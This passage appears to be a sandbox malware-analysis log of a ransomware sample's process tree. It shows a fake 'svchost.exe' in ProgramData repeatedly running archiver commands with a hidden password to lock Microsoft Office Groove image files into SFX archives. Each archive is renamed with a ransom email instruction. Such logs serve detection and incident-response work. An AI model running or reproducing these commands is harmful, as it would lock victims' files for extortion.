  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolBMPs\STOPICON.JPG(!! to decrypt email id 1307002018 to [email protected] !!)" "C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolBMPs\STOPICON.JPG" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100AuwuqLurnALALLttLquruuVntFVrnLAnqAAwtAFuur -m0 -y
  2⤵
  PID:2972
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolBMPs\StopIconMask.bmp(!! to decrypt email id 1307002018 to [email protected] !!)" "C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolBMPs\StopIconMask.bmp" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100AuwuqLurnALALLttLquruuVntFVrnLAnqAAwtAFuur -m0 -y
  2⤵
  PID:2704
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolBMPs\TaskbarIconImages256Colors.bmp(!! to decrypt email id 1307002018 to [email protected] !!)" "C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolBMPs\TaskbarIconImages256Colors.bmp" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100AuwuqLurnALALLttLquruuVntFVrnLAnqAAwtAFuur -m0 -y
  2⤵
  PID:2592
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolBMPs\TaskbarIconImagesMask256Colors.bmp(!! to decrypt email id 1307002018 to [email protected] !!)" "C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolBMPs\TaskbarIconImagesMask256Colors.bmp" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100AuwuqLurnALALLttLquruuVntFVrnLAnqAAwtAFuur -m0 -y
  2⤵
  - System Location Discovery: System Language Discovery
  PID:2292
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolBMPs\TipsImage.jpg(!! to decrypt email id 1307002018 to [email protected] !!)" "C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolBMPs\TipsImage.jpg" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100AuwuqLurnALALLttLquruuVntFVrnLAnqAAwtAFuur -m0 -y
  2⤵
  PID:2964
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolBMPs\TipsImageMask.bmp(!! to decrypt email id 1307002018 to [email protected] !!)" "C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolBMPs\TipsImageMask.bmp" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100AuwuqLurnALALLttLquruuVntFVrnLAnqAAwtAFuur -m0 -y
  2⤵
  PID:1568
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolBMPs\VeriSignLogo.jpg(!! to decrypt email id 1307002018 to [email protected] !!)" "C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolBMPs\VeriSignLogo.jpg" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100AuwuqLurnALALLttLquruuVntFVrnLAnqAAwtAFuur -m0 -y
  2⤵
  PID:2500
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolBMPs\WebToolIconImages.jpg(!! to decrypt email id 1307002018 to [email protected] !!)" "C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolBMPs\WebToolIconImages.jpg" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100AuwuqLurnALALLttLquruuVntFVrnLAnqAAwtAFuur -m0 -y
  2⤵
  PID:1924
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolBMPs\WebToolIconImagesMask.bmp(!! to decrypt email id 1307002018 to [email protected] !!)" "C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolBMPs\WebToolIconImagesMask.bmp" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100AuwuqLurnALALLttLquruuVntFVrnLAnqAAwtAFuur -m0 -y
  2⤵
  PID:2864
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolBMPs\WebToolImages16x16.jpg(!! to decrypt email id 1307002018 to [email protected] !!)" "C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolBMPs\WebToolImages16x16.jpg" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100AuwuqLurnALALLttLquruuVntFVrnLAnqAAwtAFuur -m0 -y
  2⤵
  PID:1852
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolBMPs\WebToolImagesMask16x16.bmp(!! to decrypt email id 1307002018 to [email protected] !!)" "C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolBMPs\WebToolImagesMask16x16.bmp" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100AuwuqLurnALALLttLquruuVntFVrnLAnqAAwtAFuur -m0 -y
  2⤵
  PID:1844
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolBMPs\WSSFilesToolIconImages.jpg(!! to decrypt email id 1307002018 to [email protected] !!)" "C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolBMPs\WSSFilesToolIconImages.jpg" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100AuwuqLurnALALLttLquruuVntFVrnLAnqAAwtAFuur -m0 -y
  2⤵
  PID:2644
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolBMPs\WSSFilesToolIconImagesMask.bmp(!! to decrypt email id 1307002018 to [email protected] !!)" "C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolBMPs\WSSFilesToolIconImagesMask.bmp" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100AuwuqLurnALALLttLquruuVntFVrnLAnqAAwtAFuur -m0 -y
  2⤵
  PID:1560
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\Calendar\CalendarToolIconImages.jpg(!! to decrypt email id 1307002018 to [email protected] !!)" "C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\Calendar\CalendarToolIconImages.jpg" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100AuwuqLurnALALLttLquruuVntFVrnLAnqAAwtAFuur -m0 -y
  2⤵
  PID:988
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\Calendar\CalendarToolIconImagesMask.bmp(!! to decrypt email id 1307002018 to [email protected] !!)" "C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\Calendar\CalendarToolIconImagesMask.bmp" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100AuwuqLurnALALLttLquruuVntFVrnLAnqAAwtAFuur -m0 -y
  2⤵
  PID:2876
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\Calendar\CalendarViewButtonImages.jpg(!! to decrypt email id 1307002018 to [email protected] !!)" "C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\Calendar\CalendarViewButtonImages.jpg" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100AuwuqLurnALALLttLquruuVntFVrnLAnqAAwtAFuur -m0 -y
  2⤵
  PID:1248
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\Calendar\GlobeButtonImage.jpg(!! to decrypt email id 1307002018 to [email protected] !!)" "C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\Calendar\GlobeButtonImage.jpg" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100AuwuqLurnALALLttLquruuVntFVrnLAnqAAwtAFuur -m0 -y
  2⤵
  PID:2472
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\Calendar\GlobeButtonImageMask.bmp(!! to decrypt email id 1307002018 to [email protected] !!)" "C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\Calendar\GlobeButtonImageMask.bmp" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100AuwuqLurnALALLttLquruuVntFVrnLAnqAAwtAFuur -m0 -y
  2⤵
  PID:772
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\CommonData\AlertImage_Auto.jpg(!! to decrypt email id 1307002018 to [email protected] !!)" "C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\CommonData\AlertImage_Auto.jpg" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100AuwuqLurnALALLttLquruuVntFVrnLAnqAAwtAFuur -m0 -y
  2⤵
  PID:1540
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\CommonData\AlertImage_AutoMask.bmp(!! to decrypt email id 1307002018 to [email protected] !!)" "C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\CommonData\AlertImage_AutoMask.bmp" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100AuwuqLurnALALLttLquruuVntFVrnLAnqAAwtAFuur -m0 -y
  2⤵
  PID:1620
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\CommonData\AlertImage_ContactHigh.jpg(!! to decrypt email id 1307002018 to [email protected] !!)" "C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\CommonData\AlertImage_ContactHigh.jpg" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100AuwuqLurnALALLttLquruuVntFVrnLAnqAAwtAFuur -m0 -y
  2⤵
  PID:2172
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\CommonData\AlertImage_ContactHighMask.bmp(!! to decrypt email id 1307002018 to [email protected] !!)" "C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\CommonData\AlertImage_ContactHighMask.bmp" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100AuwuqLurnALALLttLquruuVntFVrnLAnqAAwtAFuur -m0 -y
  2⤵
  PID:2532
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\CommonData\AlertImage_ContactLow.jpg(!! to decrypt email id 1307002018 to [email protected] !!)" "C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\CommonData\AlertImage_ContactLow.jpg" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100AuwuqLurnALALLttLquruuVntFVrnLAnqAAwtAFuur -m0 -y
  2⤵
  PID:1280
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\CommonData\AlertImage_ContactLowMask.bmp(!! to decrypt email id 1307002018 to [email protected] !!)" "C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\CommonData\AlertImage_ContactLowMask.bmp" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100AuwuqLurnALALLttLquruuVntFVrnLAnqAAwtAFuur -m0 -y
  2⤵
  PID:1524
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\CommonData\AlertImage_FileHigh.jpg(!! to decrypt email id 1307002018 to [email protected] !!)" "C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\CommonData\AlertImage_FileHigh.jpg" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100AuwuqLurnALALLttLquruuVntFVrnLAnqAAwtAFuur -m0 -y
  2⤵
  PID:1932
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\CommonData\AlertImage_FileHighMask.bmp(!! to decrypt email id 1307002018 to [email protected] !!)" "C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\CommonData\AlertImage_FileHighMask.bmp" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100AuwuqLurnALALLttLquruuVntFVrnLAnqAAwtAFuur -m0 -y
  2⤵
  PID:2464
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\CommonData\AlertImage_FileOff.jpg(!! to decrypt email id 1307002018 to [email protected] !!)" "C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\CommonData\AlertImage_FileOff.jpg" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100AuwuqLurnALALLttLquruuVntFVrnLAnqAAwtAFuur -m0 -y
  2⤵
  PID:2300
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\CommonData\AlertImage_FileOffMask.bmp(!! to decrypt email id 1307002018 to [email protected] !!)" "C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\CommonData\AlertImage_FileOffMask.bmp" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100AuwuqLurnALALLttLquruuVntFVrnLAnqAAwtAFuur -m0 -y
  2⤵
  PID:1672
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\CommonData\AlertImage_High.jpg(!! to decrypt email id 1307002018 to [email protected] !!)" "C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\CommonData\AlertImage_High.jpg" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100AuwuqLurnALALLttLquruuVntFVrnLAnqAAwtAFuur -m0 -y
  2⤵
  PID:2388
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\CommonData\AlertImage_HighMask.bmp(!! to decrypt email id 1307002018 to [email protected] !!)" "C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\CommonData\AlertImage_HighMask.bmp" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100AuwuqLurnALALLttLquruuVntFVrnLAnqAAwtAFuur -m0 -y
  2⤵
  PID:2376
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\CommonData\AlertImage_Medium.jpg(!! to decrypt email id 1307002018 to [email protected] !!)" "C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\CommonData\AlertImage_Medium.jpg" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100AuwuqLurnALALLttLquruuVntFVrnLAnqAAwtAFuur -m0 -y
  2⤵
  PID:2076
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\CommonData\AlertImage_MediumMAsk.bmp(!! to decrypt email id 1307002018 to [email protected] !!)" "C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\CommonData\AlertImage_MediumMAsk.bmp" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100AuwuqLurnALALLttLquruuVntFVrnLAnqAAwtAFuur -m0 -y
  2⤵
  PID:3024
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\CommonData\AlertImage_Off.jpg(!! to decrypt email id 1307002018 to [email protected] !!)" "C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\CommonData\AlertImage_Off.jpg" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100AuwuqLurnALALLttLquruuVntFVrnLAnqAAwtAFuur -m0 -y
  2⤵
  PID:2432
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\CommonData\AlertImage_OffMask.bmp(!! to decrypt email id 1307002018 to [email protected] !!)" "C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\CommonData\AlertImage_OffMask.bmp" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100AuwuqLurnALALLttLquruuVntFVrnLAnqAAwtAFuur -m0 -y
  2⤵
  PID:2148
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\CommonData\CommsIncomingImage.jpg(!! to decrypt email id 1307002018 to [email protected] !!)" "C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\CommonData\CommsIncomingImage.jpg" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100AuwuqLurnALALLttLquruuVntFVrnLAnqAAwtAFuur -m0 -y
  2⤵
  PID:2364
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\CommonData\CommsIncomingImageMask.bmp(!! to decrypt email id 1307002018 to [email protected] !!)" "C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\CommonData\CommsIncomingImageMask.bmp" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100AuwuqLurnALALLttLquruuVntFVrnLAnqAAwtAFuur -m0 -y
  2⤵
  - System Location Discovery: System Language Discovery
  PID:1608
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\CommonData\CommsIncomingImageMaskSmall.bmp(!! to decrypt email id 1307002018 to [email protected] !!)" "C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\CommonData\CommsIncomingImageMaskSmall.bmp" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100AuwuqLurnALALLttLquruuVntFVrnLAnqAAwtAFuur -m0 -y
  2⤵
  PID:3036
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\CommonData\CommsIncomingImageSmall.jpg(!! to decrypt email id 1307002018 to [email protected] !!)" "C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\CommonData\CommsIncomingImageSmall.jpg" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100AuwuqLurnALALLttLquruuVntFVrnLAnqAAwtAFuur -m0 -y
  2⤵
  PID:2132
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\CommonData\CommsOutgoingImage.jpg(!! to decrypt email id 1307002018 to [email protected] !!)" "C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\CommonData\CommsOutgoingImage.jpg" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100AuwuqLurnALALLttLquruuVntFVrnLAnqAAwtAFuur -m0 -y
  2⤵
  PID:2724
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\CommonData\CommsOutgoingImageMask.bmp(!! to decrypt email id 1307002018 to [email protected] !!)" "C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\CommonData\CommsOutgoingImageMask.bmp" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100AuwuqLurnALALLttLquruuVntFVrnLAnqAAwtAFuur -m0 -y
  2⤵
  PID:2508
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\CommonData\CommsOutgoingImageMaskSmall.bmp(!! to decrypt email id 1307002018 to [email protected] !!)" "C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\CommonData\CommsOutgoingImageMaskSmall.bmp" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100AuwuqLurnALALLttLquruuVntFVrnLAnqAAwtAFuur -m0 -y
  2⤵
  PID:2868
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\CommonData\CommsOutgoingImageSmall.jpg(!! to decrypt email id 1307002018 to [email protected] !!)" "C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\CommonData\CommsOutgoingImageSmall.jpg" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100AuwuqLurnALALLttLquruuVntFVrnLAnqAAwtAFuur -m0 -y
  2⤵
  PID:1412
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\CommonData\MessageBoxIconImages.jpg(!! to decrypt email id 1307002018 to [email protected] !!)" "C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\CommonData\MessageBoxIconImages.jpg" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100AuwuqLurnALALLttLquruuVntFVrnLAnqAAwtAFuur -m0 -y
  2⤵
  PID:2204
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\CommonData\MessageBoxIconImagesMask.bmp(!! to decrypt email id 1307002018 to [email protected] !!)" "C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\CommonData\MessageBoxIconImagesMask.bmp" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100AuwuqLurnALALLttLquruuVntFVrnLAnqAAwtAFuur -m0 -y
  2⤵
  PID:2816
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\CommonData\UnreadIcon.jpg(!! to decrypt email id 1307002018 to [email protected] !!)" "C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\CommonData\UnreadIcon.jpg" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100AuwuqLurnALALLttLquruuVntFVrnLAnqAAwtAFuur -m0 -y
  2⤵
  PID:2772
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\CommonData\UnreadIconImages.jpg(!! to decrypt email id 1307002018 to [email protected] !!)" "C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\CommonData\UnreadIconImages.jpg" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100AuwuqLurnALALLttLquruuVntFVrnLAnqAAwtAFuur -m0 -y
  2⤵
  PID:2980
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\CommonData\UnreadIconImagesMask.bmp(!! to decrypt email id 1307002018 to [email protected] !!)" "C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\CommonData\UnreadIconImagesMask.bmp" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100AuwuqLurnALALLttLquruuVntFVrnLAnqAAwtAFuur -m0 -y
  2⤵
  PID:1240
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\Computers\computericon.jpg(!! to decrypt email id 1307002018 to [email protected] !!)" "C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\Computers\computericon.jpg" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100AuwuqLurnALALLttLquruuVntFVrnLAnqAAwtAFuur -m0 -y
  2⤵
  - Drops file in Program Files directory
  PID:1836
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\Computers\computericonMask.bmp(!! to decrypt email id 1307002018 to [email protected] !!)" "C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\Computers\computericonMask.bmp" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100AuwuqLurnALALLttLquruuVntFVrnLAnqAAwtAFuur -m0 -y
  2⤵
  PID:2828
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\Discussion\DiscussionToolIconImages.jpg(!! to decrypt email id 1307002018 to [email protected] !!)" "C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\Discussion\DiscussionToolIconImages.jpg" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100AuwuqLurnALALLttLquruuVntFVrnLAnqAAwtAFuur -m0 -y
  2⤵
  PID:348
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\Discussion\DiscussionToolIconImagesMask.bmp(!! to decrypt email id 1307002018 to [email protected] !!)" "C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\Discussion\DiscussionToolIconImagesMask.bmp" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100AuwuqLurnALALLttLquruuVntFVrnLAnqAAwtAFuur -m0 -y
  2⤵
  PID:2588
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\DocumentShare\WSSFilesToolHomePageBackground.jpg(!! to decrypt email id 1307002018 to [email protected] !!)" "C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\DocumentShare\WSSFilesToolHomePageBackground.jpg" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100AuwuqLurnALALLttLquruuVntFVrnLAnqAAwtAFuur -m0 -y
  2⤵
  PID:2968
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveDocumentReview\ActiveTabImage.jpg(!! to decrypt email id 1307002018 to [email protected] !!)" "C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveDocumentReview\ActiveTabImage.jpg" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100AuwuqLurnALALLttLquruuVntFVrnLAnqAAwtAFuur -m0 -y
  2⤵
  PID:1692
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveDocumentReview\ActiveTabImageMask.bmp(!! to decrypt email id 1307002018 to [email protected] !!)" "C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveDocumentReview\ActiveTabImageMask.bmp" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100AuwuqLurnALALLttLquruuVntFVrnLAnqAAwtAFuur -m0 -y
  2⤵
  PID:1840
